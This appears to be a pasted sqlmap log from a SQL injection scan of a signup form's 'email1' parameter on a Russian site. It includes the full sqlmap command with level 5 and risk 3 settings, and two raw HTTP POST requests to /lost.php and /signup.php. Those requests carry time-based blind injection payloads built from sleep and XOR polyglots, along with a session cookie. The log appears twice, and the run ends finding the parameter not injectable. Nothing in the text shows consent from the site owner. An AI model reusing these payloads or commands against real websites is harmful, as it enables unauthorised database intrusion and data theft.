[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 18:52:38
[18:52:38] [INFO] parsing HTTP request from 'af.txt'
[18:52:38] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap\txt
\user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (K
HTML, like Gecko) Chrome/4.0.203.0 Safari/532.0'
[18:52:38] [WARNING] provided value for parameter 'email1' is empty. Please, alw
ays use only valid parameter values so sqlmap could be able to run properly
[18:52:38] [INFO] testing connection to the target URL
[18:52:38] [INFO] heuristics detected web page charset 'windows-1251'
[18:52:39] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[18:52:40] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[18:52:42] [WARNING] heuristic (basic) test shows that POST parameter 'email1' m
ight not be injectable
[18:52:43] [INFO] heuristic (XSS) test shows that POST parameter 'email1' might
be vulnerable to XSS attacks
[18:52:43] [INFO] testing for SQL injection on POST parameter 'email1'
[18:52:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:52:43] [WARNING] reflective value(s) found and filtering out
[18:53:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[18:54:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[18:55:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Gene
ric comment)'
[18:56:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[18:57:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
L comment)'
[18:58:27] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
R BY or GROUP BY clause'
[18:59:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (MAKE_SET)'
[19:00:21] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER B
Y or GROUP BY clause (MAKE_SET)'
[19:01:03] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (ELT)'
[19:02:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[19:02:11] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER B
Y or GROUP BY clause (ELT)'
[19:02:53] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (bool_int)'
[19:03:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER B
Y or GROUP BY clause (bool_int)'
[19:04:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:04:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[19:04:45] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
[19:04:46] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (
original value)'
[19:04:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
ET)'
[19:04:47] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
ET - original value)'
[19:04:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[19:04:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT -
original value)'
[19:04:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool_i
nt)'
[19:04:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool_i
nt - original value)'
[19:04:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
clause'
[19:04:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
clause (original value)'
[19:04:59] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY
clause'
[19:05:00] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY
clause (original value)'
[19:05:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[19:05:55] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[19:07:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[19:07:23] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[19:07:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[19:08:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[19:08:25] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[19:08:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[19:09:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[19:09:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[19:10:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
IGINT UNSIGNED)'
[19:10:24] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[19:10:46] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[19:11:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[19:12:08] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[19:12:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:12:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[19:12:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[19:12:39] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[19:12:39] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[19:12:45] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(EXTRACTVALUE)'
[19:12:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(UPDATEXML)'
[19:12:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
(BIGINT UNSIGNED)'
[19:12:55] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[19:12:56] [INFO] testing 'MySQL inline queries'
[19:12:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:13:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[19:14:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[19:14:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:15:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment
)'
[19:15:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:16:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:17:05] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[19:17:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - commen
t)'
[19:18:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment
)'
[19:20:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[19:20:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[19:21:43] [INFO] POST parameter 'email1' seems to be 'MySQL >= 5.0.12 OR time-b
ased blind' injectable
[19:21:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:21:43] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[19:22:03] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns
'
[19:22:22] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[19:22:28] [INFO] testing 'Generic UNION query (random number) - 22 to 40 column
s'
[19:22:31] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[19:22:36] [INFO] testing 'Generic UNION query (random number) - 42 to 60 column
s'
[19:22:58] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[19:23:11] [INFO] testing 'Generic UNION query (random number) - 62 to 80 column
s'
[19:23:20] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[19:23:27] [INFO] testing 'Generic UNION query (random number) - 82 to 100 colum
ns'
[19:23:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:23:48] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[19:23:54] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[19:24:09] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[19:24:15] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[19:24:21] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[19:24:31] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[19:24:38] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[19:24:45] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[19:25:00] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns
'
[19:25:09] [INFO] checking if the injection point on POST parameter 'email1' is
a false positive
[19:25:09] [WARNING] false positive or unexploitable injection point detected
[19:25:09] [WARNING] POST parameter 'email1' is not injectable
[19:25:09] [CRITICAL] all tested parameters appear to be not injectable. Also, y
ou can try to rerun by providing either a valid value for option '--string' (or
'--regexp') If you suspect that there is some kind of protection mechanism invol
ved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=s
pace2comment')
[19:25:09] [WARNING] HTTP error codes detected during run:
424 (?) - 2610 times
1) if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/ 2) (select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/
Resuests: 1) POST /lost.php HTTP/1.1 Content-Length: 150 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://www.site.ru/ Cookie: PHPSESSID=db5t7hrvhl32iu6e5ur9v6pdd2; defltlang=1 Host: www.site.ru Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: /
email=if(now()%3dsysdate()%2csleep(0)%2c0)/'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22/&form=sent
2) POST /signup.php HTTP/1.1 Content-Length: 402 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://www.site.ru/ Cookie: PHPSESSID=db5t7hrvhl32iu6e5ur9v6pdd2; defltlang=1 Host: www.site.ru Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: /
allow_emails=yes&canpay=1&confirmcode=g00dPa%24%24w0rD&email1=(select(0)from(select(sleep(0)))v)/'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22_/&email2=sample%40email.tst&form=sent&lang=English&name=anmkklor&passb=g00dPa%24%24w0rD&passwd=g00dPa%24%24w0rD&pay_to=3&receive_paidmail=0&send_weekly_stat=no&sitename=anmkklor&site_lang=1&termscheck=1&url=http://
Log SQLMAP: sqlmap.py -r af.txt -p email1 --random-agent --dbms=mysql --level 5 --risk 3
**| |_ {1.0-dev-nongit-20151211} |_ -| . | | | .'| . | || |||||**,| | || |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program
[*] starting at 18:52:38
[18:52:38] [INFO] parsing HTTP request from 'af.txt' [18:52:38] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap\txt \user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (K HTML, like Gecko) Chrome/4.0.203.0 Safari/532.0' [18:52:38] [WARNING] provided value for parameter 'email1' is empty. Please, alw ays use only valid parameter values so sqlmap could be able to run properly [18:52:38] [INFO] testing connection to the target URL [18:52:38] [INFO] heuristics detected web page charset 'windows-1251' [18:52:39] [INFO] testing if the target URL is stable. This can take a couple of seconds [18:52:40] [WARNING] target URL is not stable. sqlmap will base the page compari son on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c [18:52:42] [WARNING] heuristic (basic) test shows that POST parameter 'email1' m ight not be injectable [18:52:43] [INFO] heuristic (XSS) test shows that POST parameter 'email1' might be vulnerable to XSS attacks [18:52:43] [INFO] testing for SQL injection on POST parameter 'email1' [18:52:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [18:52:43] [WARNING] reflective value(s) found and filtering out [18:53:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' [18:54:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen eric comment)' [18:55:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Gene ric comment)' [18:56:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS QL comment)' [18:57:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ L comment)' [18:58:27] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE R BY or GROUP BY clause' [18:59:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' [19:00:21] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER B Y or GROUP BY clause (MAKE_SET)' [19:01:03] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' [19:02:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go ing to retry the request [19:02:11] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER B Y or GROUP BY clause (ELT)' [19:02:53] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool_int)' [19:03:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER B Y or GROUP BY clause (bool_int)' [19:04:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:04:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' [19:04:45] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace' [19:04:46] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace ( original value)' [19:04:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S ET)' [19:04:47] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S ET - original value)' [19:04:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)' [19:04:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)' [19:04:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool_i nt)' [19:04:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool_i nt - original value)' [19:04:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [19:04:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [19:04:59] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' [19:05:00] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' [19:05:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries' [19:05:55] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries' [19:07:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause' [19:07:23] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' [19:07:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (EXTRACTVALUE)' [19:08:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [19:08:25] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (UPDATEXML)' [19:08:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [19:09:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go ing to retry the request [19:09:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (BIGINT UNSIGNED)' [19:10:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B IGINT UNSIGNED)' [19:10:24] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause' [19:10:46] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause' [19:11:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [19:12:08] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT VALUE)' [19:12:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [19:12:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT VALUE)' [19:12:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX ML)' [19:12:39] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' [19:12:39] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[19:12:45] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)' [19:12:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)' [19:12:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)' [19:12:55] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[19:12:56] [INFO] testing 'MySQL inline queries' [19:12:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' [19:13:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)' [19:14:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' [19:14:36] [INFO] testing 'MySQL > 5.0.11 stacked queries' [19:15:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment )' [19:15:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [19:16:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' [19:17:05] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)' [19:17:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - commen t)' [19:18:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment )' [19:20:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [19:20:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind' [19:21:43] [INFO] POST parameter 'email1' seems to be 'MySQL >= 5.0.12 OR time-b ased blind' injectable [19:21:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [19:21:43] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other (potential) technique found [19:22:03] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns ' [19:22:22] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns' [19:22:28] [INFO] testing 'Generic UNION query (random number) - 22 to 40 column s' [19:22:31] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns' [19:22:36] [INFO] testing 'Generic UNION query (random number) - 42 to 60 column s' [19:22:58] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns' [19:23:11] [INFO] testing 'Generic UNION query (random number) - 62 to 80 column s' [19:23:20] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns' [19:23:27] [INFO] testing 'Generic UNION query (random number) - 82 to 100 colum ns' [19:23:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [19:23:48] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns' [19:23:54] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns' [19:24:09] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[19:24:15] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns' [19:24:21] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[19:24:31] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns' [19:24:38] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[19:24:45] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns' [19:25:00] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns ' [19:25:09] [INFO] checking if the injection point on POST parameter 'email1' is a false positive [19:25:09] [WARNING] false positive or unexploitable injection point detected [19:25:09] [WARNING] POST parameter 'email1' is not injectable [19:25:09] [CRITICAL] all tested parameters appear to be not injectable. Also, y ou can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism invol ved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=s pace2comment') [19:25:09] [WARNING] HTTP error codes detected during run: 424 (?) - 2610 times
[*] shutting down at 19:25:09